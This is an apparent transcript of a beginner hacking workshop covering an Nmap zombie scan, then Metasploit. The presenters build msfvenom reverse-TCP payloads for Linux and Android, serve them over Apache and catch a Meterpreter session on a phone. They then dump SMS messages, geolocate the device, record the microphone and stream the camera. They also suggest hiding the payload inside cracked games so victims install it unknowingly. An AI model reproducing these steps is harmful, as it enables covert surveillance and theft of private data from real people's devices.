have to give a host and then the if you have to give a zombie and then the host. No targets are specified, so zero host. Just a second, just a second. Okay, okay. So my bad. 58 it is. Yeah. Okay. See, now it's scanning. See, idle scan using zombie with www.google.com. That is, this is the IP address of the google.com we are using. All right. So this machine won't know that we are scanning. It will get this IP address of the google.com. So it will think that it is being scanned by google.com, which is fine by many of the operating systems. It's perfectly looks normal, right? So Google is coming to scan us. So it's perfectly normal. But what it won't know is that a hacker is getting all this information about that machine. So this is how the zombie scan actually works. Okay, guys. So that's it for a zombie scan. And please let me know if any doubts in the comment section. Uh, our team will try their level best to answer you. It's time for the attendance. So this is the attendance link. Guys, please note there. Please take a screenshot because today we cannot give it on the chat. So please take a screenshot.
Should we provide in the QR form code so that they can scan it?
No. Leave it, man. Leave it. Just please take a screenshot of this. It's very big. Means it's the letters are quite visible. And if you want, I can zoom it more if you want. So please take a screenshot first.
Just give them 30 seconds so that they can do it.
So that 30 seconds are over, man. Okay, let's give 5-10 seconds more. So please, you can always go back in this video and just take a screenshot of this. And this attendance links would be open till 12 o'clock tonight. So no worries, guys. As much you want, as many times you want, you can go through this video. You want to learn as many times you want to go through this video, you can do. So that's all the time we have for this. Thank you. So yeah. So I
If you are
guess,
seeing the chat section, many of they have given attendance. Yes.
yeah. Okay, we will provide you PPT for better explanation. Okay. What are you confused about? Confused at zombie scan. Okay. Okay, no issues. What is that? Pratyush, you can contact over this. You can put your doubts on this DSC doubts channel, and we will clarify your doubts as soon as we can. Okay. So it's time to move on into and gets our hand dirty. So we will be hacking into machines. We will be learning into hack. So in my system, in zombie scanner shows operation not denied. Operation not denied. Uh, Manmat, please, not permitted. Okay. So Manmat, please put your doubts in the doubt channel, because or Noba will try to rectify it, or try to help you, or our team will try to help you. So let's move on, guys, and let's continue with this session. So let's do this. The screen is visible, right, Noba?
Yes. Yes.
Fine, thank you. So gaining access. So that's the dream of every hacker here, right? How to hack into systems, how to hack and breach, exploit vulnerabilities, etc. So just give me some time. Just wait a minute. Okay, so before starting, are you guys interested? Put your thoughts in the comment section. So let's move on. So how hackers hack? So there are three main categories of how we approach to hack. There are three things. First, 90% of hackers use this: social engineering. What is social engineering? We will discuss about this topic in detail in the last session, I guess, which is on phishing and modern threats. But let me give you a brief about this topic. So social engineering is a sector, means how what we do is that we try to manipulate people. All right, we try to manipulate people to give us information. We try to manipulate people to give us access to things we must not have access to. We try to manipulate things to get what we wanted. All right, it's completely based on how well you play. All right, so according to a recent research, 90% of hacking is social engineering. Before you hack into system, the major hacks, Twitter hack, Facebook hack, anything, anything right now is 90% social engineering, 10% skill. So it's all reconnaissance, it's all social engineering. All right. So let's move on to the next thing, that is exploiting system vulnerabilities. So once you do research on a thing, once you get all these details using Nmap, once you get everything, so sorry for that. Once you get every details, every vulnerabilities you that is present in the system, you can just go forward and try to hack into the system using those vulnerabilities. You will try to exploit the buffer overflows. You will try to exploit the remote code executions and all these things. So the third one is rat. Wait a second. So social engineering is what we know. So social engineering is something like we try to manipulate. I said system vulnerabilities. We know that it's a system vulnerability. System is vulnerable. System is not update. Operating system is not update. What the hell is this? It's a kind of joke, right? Actually, it's not. It's the most dangerous thing in this cyber era. A rat. It's not like a rat in Tom and Jerry, but it's a remote access Trojan. All right. So what is a Trojan? So a Trojan is something that is disguised as something else. Seems a bit like a fairy tale, isn't it? So it's actually kind of This name has taken inspiration from Greek mythology, the Troy War, where the Greeks actually sent a Trojan horse into the walls of Troy when they were unable to breach into the walls, unable to penetrate the walls. So they tried to disguise themselves as friendly natures, and they are friendly, and they tried to breach into the walls using a horse, wooden horse. What happened is that inside the horse there were Greek soldiers who, in the night, opened the gates to those castles, and all the Greeks army just came rushing in, and that completely destroyed Troy. Troy was in flames. So a hacker tries to do exact this thing. He tries to disguise a application, a malicious application, as a normal thing, or what a user would like to accept, without thinking of the casualties he might have to experience due to it. So these might be your some cracked app of some highly paid apps like Adobe Photoshop. It might be some highly paid apps in mobile phone, like something like crack of PUBG or crack of Free Fire, crack of Call of Duty, something like that. It might be anything. Even the simplest of simplest, a doc file, a word file, a PPT, or image will might also contain a Trojan that can hack your system. So let's get our hands dirty. Enough of talk. So now let's move on to Metasploit. Because this is a beginner friendly session, so we are not diving it deep into making exploit or writing exploits. So we will be just using the pre-made exploits available over the internet, or what is pre-built into the Metasploit framework and all these things. So we are gonna use that. So what is Metasploit? Metasploit is the largest framework. It's the largest, all-time largest framework ever built for Linux, Kali Linux, and it contains thousands of exploits, thousands of payloads, hundreds of payloads, and means it's a very large database type of thing. We most of the hackers generally in the starting level, starting days, use this framework to hack into systems and gain knowledge. So this is how a Metasploit screen would look, and it differs from time to time. This MSF banner, so you can try MSF console to get into this Metasploit framework console, and you can use show exploits to see all these exploits. I will just show you how it actually works and all these things in a while. You can use the show payloads to check all the payloads available to hack into systems. You create a payload and deploy that. So let's move on to Metasploit. So now what will do is that we will try to hack into this vulnerable machine of ours using the Metasploit. So I will just type msf console and press enter. So what I will be showing you is a very normalized exploit, means just changing a few bits here and there. You can hack. I will try to hack a Linux operating system, which is considered one of the most secure operating systems in the world. So because this is the other thing I have scanned, you might already be knowing that it's a Linux operating system, though it's vulnerable. But yeah, everybody knows. So it's a Linux operating system, right? So we will be trying to hack it, and what I will also tell you some basic changes that you can do to hack into Windows, hack into Android, hack into iOS, anything. So first of all, sorry, sorry for that. Yeah. So I think it's too large. Sorry. Yeah, I think it's visible right now. So here all these help commands are there. What all we can do with MSF console and all these things, just type help. You can access this MSF console by typing Metasploit framework console with typing MSF console. on the terminal, and this would open up and launch it. So just let's move on and let's see, check it out. Here it is showing all these things, like here, check it out. 1947 exploits, 1089 auxiliaries, 333 ports, 556. Actually, these are extras, means 1947 exploits are the codes that we use to exploit our vulnerabilities. Auxiliaries are the additional things, additional codecs, and posts are the post exploitation commands, means once we gain access to the system, there are a couple of rules we follow, like how to retain access, how to clear tracks, and all these things. So this post helps us to do all those things. So there are payloads which we can send to hack into systems. There are encoders, there are knobs, evasion payloads, and all these things are there. So just type to check out all the exploits. Show exploits. All right. A better option would be to search. So just I have typed show exploit, so it would take a bit of time, and let's move on to a new tab by the time it shows us output. So let me turn on MSF console over here also. It's taking time. Nobo, is it visible correctly? Is there any problem with my network or something?
No, no, it's clearly visible.
It's yeah, the RAM is correct, working fine, right? Okay, fine. Let me know if it's blur or something like that. Okay. So yeah, so search. This command we can use to search, go through this exploits, payloads, and all these things. So what we want to search? We want to search Linux. Uh, let's type Linux. So you can see 641 results are there. Post, Windows, and post. These are post. That is the post exploitation. These are payloads. And just a second. These are exploits and all these things. These are all related to Linux. Okay, so this screen is a bit large, so I guess that's why it is showing like this. But if I make it small and try to fit all the things in a single line, it would look too small for you in the screen. So anyways, so here it has listed all the exploits. All right. So what I will do is that I will try to search a Linux payload. So I will just go to payload, and then I will just go through this file shell reverse TCP. Let's type show payloads. Let's do it simply. Show payloads. So this would list you all the payloads that you can use. So here we will go back a bit to know where it is. Just check out for Linux. Okay, the OS X. We got Linux. Yeah, Linux. So here it is there. Shell reverse TCP. Should we use it or should we use Meterpreter? Let's take any of the shells. So there, here you might be seeing two options. That is, one is bind, one is reverse. Okay, these are two types of shells. Okay, there's a thing called bind shell. Bind shell actually directly communicates with a vulnerable device to actually hack into it, and reverse shell actually does it the other way. Means the vulnerable device actually sends its shell voluntarily to you. In bind shell, you try to actually extract it. So anyways, we will do it. Let me let me check if there's anything. Okay, so we will create a payload. Okay, so I will just type msf venom -p, and then I will type this l host. Oh, sorry, l host. And what's the l host? Let me check. Okay, so this is the l host, local host. So then I will just type l port. So ports, as I have told you, it ranges from 0 to 65535. So total 65536 ports are there. So actually what it does is that, yeah, here you can give, I will recommend you giving anything in the range of uh, greater than 1500 to 65535. And if it doesn't work, just change the port number of it. So you can give any number ranging from 1025 to 65535, any number. So just if it gives any problem, it means some other service is currently using this port. So you just need to change the port number. So I will just use 4444, that is quad 4, and I will just, let's check what it is showing. Right, it will show some gibberish things, I know. By the time it creates one, let's move to cd/var/2. All right. Okay. Okay. So here you can see the payload has been created, but it's some gibberish things. All right, because we are trying to create a Linux payload. So what's the executable in Linux? In Windows, we know that the executables are named as .exe files. All right, in Linux, it is .elf. Okay, so what we will do is that we will redirect this thing. Let me do it clear first. I think so. It would be great if you can see it on the top. Clear, fine. So this was the payload I created. So I will just term it hackforfun.elf. All right. So now I will just press enter, and in the meantime, let's create something else too. So I will just search Android. All right. So what we want is that we will do something reverse TCP, maybe. Let's try it out. Okay, so let's try this out, and we will just make another payload, msf venom -p. Same syntax, guys, same syntax, just msf venom -p, the name of the payload, and and then the l host equal to dot, I forgot the l host. 58.132. L port to, let's give it 5555, because we will be using that 4444 for connecting to this Metasploit. So let's give 5555. And what's the extension for Android? It's .apk. So what we will do is that hack for fun. Let's give my number 5. So .apk, that's it. Nice. So now we are creating this Android payload, and let me clear it. So here you can see that sorry for that. Please check this errors. All right, sorry for that. If the payload runs successfully, you will get something like this, that payload size. And if it doesn't, yeah, see. Okay, so now we have created two payloads, ls-al. So now let's check out the payload. Yeah, see, the size is this much. Okay, fine. So the payload has been created. All right. So we created two payloads, one for Linux, one for Android, and similarly you can create for Windows 2. So I'm leaving that for as a task for you. So let me show you how these exploits are working. So first of all, we will start a service known as Apache. Service Apache to start. If any problem you are getting regarding starting this service, just install Apache service. It might be the case that the Apache service is not installed, or it is outdated or something like that. So please update the Apache. If it is completely new machine, then it comes already pre-installed, so no need to worry. If you are getting an error, just try to means install it, right? So service Apache to start. What this Apache to start does is that Apache is a server service, means it actually creates a server on our machine, so that any other devices can access our machine's web page through their web browsers, whatever we want to show. So this Apache service you might have used in while developing some web page, local web pages, or if you are into web development or have any idea how web development is done, or have researched about web, then you might have already come across this Apache services, Nginx services, and etc. So I am currently using this Apache service. So service Apache to start. So this will start the Apache service in my machine. So once I start this Apache service, I will like to check out these two files, right? I will just move hack for fun. I just give star.star, and it will, I just want to copy both of these files. Okay, /var/www/html. So this is the folder where our Apache service actually runs. So if we put files into this folder, so the other machines in our in our network can access these files through internet. Fine. So let's do ls quickly to check if those have actually moved, because one thing about Linux move command is that if you type in the directory name slightly incorrectly, it will not show you an error. All right, it will not show you an error, and it will just move it out, and then you will never find it. Means it's gone. You have to make it again. Okay, so here you can see that both of these my files have been moved over here. All right, so now let's move to our web browser to check if it has got where we want it to. So let's move to our web browser, and just a second. Okay, so here's the web browser. Here you can access your own web browser by two ways. You can just type your IP address in this web browser, or you can just type localhost. Both of these will give you the same results, because localhost refers to the my own machine. Even if I don't know the IP address of my own machine, I can just type localhost and it will show me the web browser results. And but if any other device wants to connect or take things, download, see the web pages of mine, it needs to put in this IP address of mine. All right. So as we put in this IP address, so we can see these files are over here, hackforfun.elf, hackforfun.apk. So let's move on to this metasploitable. Extremely sorry guys, this is if it is small, just try to zoom in the screen, because this is the size of metasploitable. I cannot help in this, but I assure you all these steps are given in the PPT, and you can refer to the PPT, and no worries, not much steps are there for in here for to learn. So I will just use wget. Wget is a utility to download something from the web. So I will just put http:// my IP address, that is 168.58.132, I guess. Let me check. 132, yeah. And I will just type in the hackforfun.elf. So once it successfully completes, you will see 100% completion. So I am doing it in Metasploitable, so I need to completely rely on this Linux commands and all this stuff. If you are using a GUI based version of Linux like Ubuntu, Fedora, or any other machines, unless you are using CLI, you can do this very easily. Just go in the browser and type the IP address of the hacker machine where you have hosted the files and just download it. That's simple. So before here I have downloaded the file. Now I will do chmod +x. So what I am doing is modifying the permissions. So now it will have, it can, I am just changing it to executable, hackforfun.elf. All right. Before running, what we need to do is that we need to set up a exploit, right? So now the this payload has reached its destination. Now let's move on to create a exploit. We will use exploit multi-handler. Exploit multi-handler. So it is a multi-purpose handler, means you can use this for Windows, you can use this for Linux, you can use this for Android, anything. So show options. This is the current option. What you need to do is first set payload. What is the payload? This is the payload. Just copy it from here and just paste it over here. And do show options once again. You will see new options that are required. So you need a local host, right? Local host is the IP address of your machine. Localhost is the IP address of your machine. Local port is the port number of your machine through which you want to make the connection established. So I will just do set lhost 192.168.58.132. Am I right? Yeah. Fine. So let's check again the options. Show options. Yeah, it's set. So now we can do two things. We can use run or we can do exploit. Both of these works the same. I will use exploit. It seems kind of okay. So just press enter, and once this payload actually gets executed in this thing machine. Okay, command not found, unexpected error file, hackforfun.elf. Oh, so okay. Just a second. This something like this would happen. So I think the session is coming. Command cell session 1 opened. So here you can see the session has been opened. So connection is coming. So it's taking a while. I don't know why, but something's wrong, man. So here you must get this thing. Actually, the Metapreter session over here. So it's actually not running. I don't know why. Some issues are there. Okay. Okay, let's try another thing. Let's move on to this Android thing and let's use multi-handler. So I'm just trying to hack into this Android machine. I don't know why. It's some connection problem, I guess. It's not actually. It has got the session. It has executed, but it's not actually giving me the shell due to some reason. So I will just look into this matter and contact you. So let's set L port to 5555. Okay, before pressing run, I will just go to my Android and I will just try to download this file. Uh, .132. Okay. It's actually not. This Apache service is something faulty, I guess. Yeah, it couldn't get it. 192, 168, 58, or 132. Just a second, guys. Let me restart this Apache service. It actually happens sometimes. So It's inevitable kind of thing. If this happens, just restart this Apache service and just try it out again. Just a second. Just a second. This is not working, man. Okay, Nobo, kindly continue with the bonus section. I will just check it out. What's the problem with this is?
Yes,
Let's just
sure,
try to.
Abhishek.
Hmm.
Till then, let us get a bonus part so that it can be manageable that within that time. Yeah, I think so. It's visible, and now I don't think any issue will be there. So, in today's bonus section, just I would like to give you 100 hacking tools and resources which can be useful for you. Like those tools and resources are very has been included in my GitHub private repo, which I have not given as public, but this repo will help you out to explore with the many hacking tools and resources which has a greater feature to the world. But before that, I would like to show you like 100 hacking tools and resources which has already been created, and I have added all those file links and those names to my repo so that it can be useful for you. As you can see here, going ahead with the web hacking, then there are many tools. So I would not like to bore you by telling that these all tools are for just for web hacking. Then these tools are for mobile hacking, and these tools are for exploitations, scanners and frameworks, data sets and services, malicious hacking tools. Right, this particular part was the interesting part. So when you are using these types of tools, then before using those tools, be aware of that those tools are, how those tools are running, and many everything else, so that in future it it can be useful for you. Yes, this repo is private to me, and I will make sure that it is public so that it can be useful for everyone. There are 100 tools and resources which can be useful for you, and we have created those bonus parts for you. These applications are not created by us, but yes, these applications are very much useful for you. These are applications are like you might have been knowing these applications when those sessions are out here by Banerjee and me. So just give me some time so that I can make this repo public to you and let you get soon with you. Just a minute. Yes, settings. making it public for you all, and here it goes. This is a set of collections which I have created and stored in my GitHub repo. I will share you all this part in the chat section, and here it is. This repo has all the tools which will be using by us in further sessions, and you can say that these tools are very much useful in your life of hacking, like web hacking, mobile application hacking, and many thing else. So Banaji, is your Metasploit working right now?
Just give me some time. It will be in a while. Just give me some time.
No issue, no issue, because these types of applications or this type of hacking tools, when we create or use, some issues we face, and this is a normal issues. So do not hesitate to think. Okay, till that, if you think that it might take some time, then I would like to give the folks with another bonus point so that it can be useful and we will not waste their time also.
Yeah, yeah. Please go ahead.
So here is the extra bonus part, like we have all created those bonus parts for you all so that it can be useful, and these parts are very much useful for you also. Like for the extra bonus part for today, which is there right in front of you. Now I'm providing the GitHub link also. This is a very calm way for an ethical hacker to handle it. So this is the code for fun link, like hack for fun event. As our event is hack for fun, but hacking also requires the code to develop the future with the help of present. Now I will make sure this repo is public so that it can be useful to you. There is a huge contribution done by all the coders of the world, because this is the link where which I am providing right particular moment in few seconds, and making it public so that it can be useful by everyone. uh, and we also know that everyone but might be in coffee shop and tweet someone, and we also don't know that particular person. He might be in the front of us in our coffee shop, and we don't know that he's a coder and he's a person who has developed those applications. So those applications or those tools are very much useful. Like I would like to show you. Yes, and here goes the safe key. Yes, I think the screen is visible, and here goes the tools. First, coming with the book part, all the hacking web application tools and each and everything out here for the books which are provided by the hackers or the developers are in the form. And then coming to the documentations, like in today's world, major part is on e-learning or digital learning. So many things we do not refer on book, so we refer on websites. So these websites can be useful for you. Coming next to the tools which are provided by many great developers, and this is the extra part. So these tools are very much useful for you for the exploiting or creating security applications or creating some frameworks or many more. As you can see there, there are many and many tools which are provided by the coders, and coming with the cheat sheet. And I don't need to say what is cheat sheet and how, why we use it. Many this is the frequent word we use, and so everyone knows about it, so do not require to say about it. And coming to the docker image of the presentation testing, penetration testings, this is the very much useful part which I have created for you. Or means these tools are not created by me but collected, so it can be useful for you and everyone. Coming to the vulnerabilities, and few courses out here with the great hackers or some good coders, and these labs for testing purposes which are been provided, so that while doing some things in your virtual machine, it may you might not have some features, then you can use those labs provided by many of the hackers or many of the developers. And these all, so I will make sure that these tools are public to you, and it can be very much useful. Give me some time so that I can make it public because it's private. Settings, and here it goes. I'll just provide the link in the chat section so that it can be useful to everyone. So go through it, guys. It will be very much useful for you. And Banerjee, should we?
Yeah, yeah. Let me start.
Yes.
Okay, so guys, sorry for that error over there. Actually, these tools are not that trustworthy, as you might know. So sometimes it fails. All right. So now I just may will share my screen. Just a second. The error has been resolved. So thank you for your patience and thank you for sticking around. So let me just show. Nova, please. Yeah. Thank you. So I hope this visible. This Kali screen is visible. Nova, please confirm.
Yes, yes, it's visible.
Yeah. Thank you. So I just closed those applications and I just started it all over again. So I just ran this MSF console to open this Metasploit. Just a quick recap. So I just typed MSF console to open this Metasploit framework. And then I just created a payload. So I directly didn't go for Linux. I just directly tried for Android. So MSF Venom -p Android Meterpreter reverse TCP. So reverse, I am trying to connect through reverse TCP connection. My local IP address, all right, and my local port that I want to use, and I am creating a APK file. All right. So after that, I am using a exploit multi-handler. Once the this payload has been created, once the payload has been created, once this payload has been created, I am using a exploit multi-handler to manage the exploit, to run the exploit to be precise, and then I am just setting the payload that I am going to use in the multi-handler. So this payload name will be exactly same as that of the payload we used while creating the payload APK payload. So now I will do show options. All right. So once I do show options, I'll get two options: to enter L host and to enter L port. So what I did was, so in lhost I just entered my IP address. So this is my IP address. Now I just connected over my wireless network, the mobile I want to hack. I just connected over wireless network. So I am just typing in the IP address of my wireless interface, WLAN 0. So I just entered this IP address and then a random port. So because the previous ones didn't work, 4444 didn't work out, so it might be used by some other service or something. I don't know why, but it didn't work. So anyways, I just changed the port and it worked out perfectly. So once I click run, and then what I did, once I clicked run, I just went to the mobile phone browser. I went to this IP address. Like I just went to this mobile. Imagine this is the mobile phone browser. I just went to this IP address. I just entered this IP address. I was able to see all these files listed over there. I just downloaded this file, APK file, and just installed in my mobile phone. This is what a normal user would do normally, right? If you are this just binding this APK with a normal file, like for example, if you are binding such payload with a Call of Duty a file like which is of 2 GB 3 GB size, and that guy is just taking it for a hack or something like that, some free gifts or something like that, he is taking it. And this file is not more than maybe some 10 to 20 KB, sorry, 9 KBs. So 9 KB file. So he won't even get it, right? And what special thing about these files is that it sometimes it means it is such crafted, such like that you can't see this APK after installation. Once it's installed, it won't show up on along with other apps, right? So this is a hidden payload. So once I run this APK, install that APK over there, the connection is established. And once I open the APK, means imagine the victim is playing Call of Duty, and you get the metadata session over here. So it actually died. So let me run it again because it was inactive for a while. So it died. So let me, yeah, so I got it. So what is happening? See what is happening. I didn't even click, right? I know you can't see it, but I didn't even click. Once it is running, it's always running. It is persistent. Means once I try to get the session, within seconds it will try to contact it. And whenever the app is installed in that system, in that mobile phone, it will get this session, right? So let's type help and check out all the options that is available. First of all, this is very interesting, guys. If once you know what a till now you only knew what a hacker could do once he gets a mobile phone access, and now you will be able to say it what actually how dangerous it is. So app install, he can install apps, he can show do app list. Let's do app list, right? So check out what apps are there. There is app run, there is app uninstall. So here let me reduce it a bit. So here you can see all the apps like YouTube, music, word profile, Viper, VPNs, all this VPN dialog, Vidmate, Vanced, VLC, Turbo VPN, and Termux, TED, Telegram. All these things are there. Shell, SIM contacts. Yeah, why not? So you get everything, every damn thing you get over here. So it's all the apps, all everything. Orbot, that is the modified version of Torbot. It's actually Tor browser. So so let's go through this help menu once again. So we can run any app through here. Means if I press, you just try it out at homes if you want. You can press app run and then package name. It will just open up that app in your mobile phone. Even if you don't click on it, it will just open it up. So there's app uninstall, WLAN geolocate. So this is dangerous one. So now we are getting into pretty dirty stuffs. Geolocate. So we can track exact location. That will be that precise when you do turn on your location and Google Maps tracks you. It will be that precise. That is around 10 meters radius. All right. So WLAN geolocate, wireless local area network geolocate. So that this is one. This is the actually geolocate what I was talking about, that Google location one. So this is one. Dump call logs. So let's do it. I don't think so any call logs are there. Okay, reason died. Sorry for that. That's it's actually dying due to this network connection is not that great. Okay, dump call logs. Oh, oh sorry. Oh, what was the command, man? Okay, just a second. Call log. Acha, okay. Call log. I was giving extra. No call log entries. Actually, it's a formatted phone, so there won't be any call log entries. But if you want, if you are running it in your system, in your device, so you will get a lot of call logs. You will get a lot of SMS. Let me check if there's any SMS over here. Yeah, there is SMS. So it's gonna please dump SMS, right? So dump SMS. So let's see. Fetching 812 SMSs, SMS saved to SMS dump.txt. So let's do ls. Okay, so sorry, it's metadata session, right? So I'll just go, yeah, SMS dump.txt. So once I do SMS dump, let's not cat it, let's get the first 10 lines or so. SMS dump.txt. So it's something like this. And remote port is this hyphen, and I will do 50. So yeah, see, all right. So I just grabbed first 50 lines because dumping the complete SMS list would be very difficult. So revised and all this thing. Sakuntala Devi, I don't know why these are coming. Anyways, so so sure. So that's it. And so all these SMS files can be accessed, and all this stuff can be done. So just second, one more thing I want to show you over here. Let's just let me remove this SMS. So okay, fine. So next, let's move on. So here's a play. So play command will be enabling you to play any audio file, video file, etc. There's a command known as record make. This is very dangerous. This webcam commands, actually all the mobile phone hacks are very dangerous things. And record make, so you can record the microphone voice without even means the victim won't even know that you are recording the microphone voice, and you can hear it. So you must have already seen in movies like hackers are listening to these chats and all these things, and the people won't know, and they are way far ahead, means 10 steps thinking way ahead of the police and all these things. They have all the intel. This is how it's done. And screen share, screenshot, grab a screenshot of the interactive desktop. Nice. So we will just get into webcam stream. Let's check it out. I think it would pop up a okay, opening player at okay, copy selection. Yeah, okay, fine. Here you can see the webcam is streaming, right? Yeah, it's streaming. There's a phone, there's a laptop and stuff. So it's actually the back camera of the mobile phone that it's streaming from. So it's actually working, right? So let's this is how you can do a front camera also as you wish. Okay. Okay, so let me do it run again because it's dying continuously. I don't know why. It's due to some Android Play things, Play security or something like that. Okay, so let's go to the help section again. So we saw that we could get the webcam chat, webcam list, and all these things. So there are a lot of commands. You can try it out. All these special commands are there. These are the normal commands of Meterpreter shell. And you might be knowing that Android is also a Linux platform based service, Linux kernel based service. So all the Linux commands actually work over there, like ls, cd, and all this stuff. So you can do a lot of stuff. So please go through this, explore this. It would be a lot of fun for you. Like you can control a phone as you like it. Means it's completely hacked like this stuff. So and make sure this mobile phone will get hacked. Means it will remain hacked until you remove that apk file, completely uninstall the apk file or remove that apk file from your device. All right, so that's it for today, and with this I would like to conclude the session. I hope you all enjoyed the session for today. uh
Yes,
okay,
guys, this
fine.
was very much important part at the end because this was very much interesting, like hacking some devices, and it is very much useful for you also. So do not worry. The session was too long, but it's very much important to know how these things work.
just a second. There's a question. Rockstar Devil या LAN exploits है भैया? WAN exploit setup करके बताइए. Rockstar Devil, actually what we did was over WAN. If you can recollect, let me share my screen. Nobo, please accept it again. Just a second. Please accept it. Yeah. So Rockstar Devil, it's actually this exploit. What I did hacking into this my Android device, it was over WAN. Okay, it was over just a second. It was no, it's actually over LAN. WAN, you need to port forward. Actually, sorry, I can miss. Sorry, I was means I thought it was Wi-Fi. Okay, so it was. LAN only. It relates to port forwarding. Yeah, I understand your concern, and we will just, if time permits, we will try to display it in the further sessions. But okay, that's not that much. We can display it. Okay, we will take your advice into consideration. We will try to show you how these exploits actually work over WAN. Okay, no issues with that. Okay, Novo, please continue. Okay, thank you, Rockstar. I will just take care of that port
So
forwarding and all this thing.
thank you everyone because this was very much important. So we will meet you once again on the next day on the day 3 session as with the cool stuffs and which will be very much useful for you also. So stay happy and join on Discord for the quiz at 8:30 sharp 8:30. Enjoy.
Yeah, guys, join us at the quiz. And if you have any doubts regarding the session or regarding anything, any suggestions regarding the session, like Rockstar had given us that over WAN, how to do it, and all these things, please contact us over Discord. And Mahesh, you need to be in the same network for doing these hacks. Yes, you need to be in the same network. For now, what we have taught you is you need to be in that same network as for doing these hacks. Means you will be only be able to doing a hack into someone who is in the same network. Thank you. Thank you, guys.
Thank you, everyone.
Thank you for your patience. Thank you for sticking around for today. Thank you for all the love and support. And we will be meeting on 7th at the same time, 5 to 7. And thank you. Hope you enjoyed the session and keep hacking. Thank you.